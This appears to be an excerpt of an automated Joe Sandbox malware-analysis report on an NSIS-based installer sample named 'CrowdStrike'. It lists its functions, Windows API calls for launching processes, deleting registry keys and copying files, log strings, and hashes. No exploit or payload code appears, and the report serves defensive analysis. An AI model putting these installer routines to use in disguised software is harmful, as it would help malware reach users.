                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                        Strings
                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                        • Exec: command="%s", xrefs: 00402241
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                        • API String ID: 2014279497-3433828417
                                                                        • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                        • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                        Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                        • MulDiv.KERNEL32(0000D200,00000064,?), ref: 00403295
                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                        Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                        • wsprintfW.USER32 ref: 00404457
                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$@rD
                                                                        • API String ID: 3540041739-1813061909
                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                        Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                        • API String ID: 1697273262-1764544995
                                                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                        Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID: $@rD
                                                                        • API String ID: 3748168415-881980237
                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                        • API String ID: 2577523808-3778932970
                                                                        • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                        • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                        Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatwsprintf
                                                                        • String ID: %02x%c$...
                                                                        • API String ID: 3065427908-1057055748
                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                        • String ID: <RM>$MostIsrael$WriteINIStr: wrote [%s] %s=%s in %s
                                                                        • API String ID: 247603264-1334740661
                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                        Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
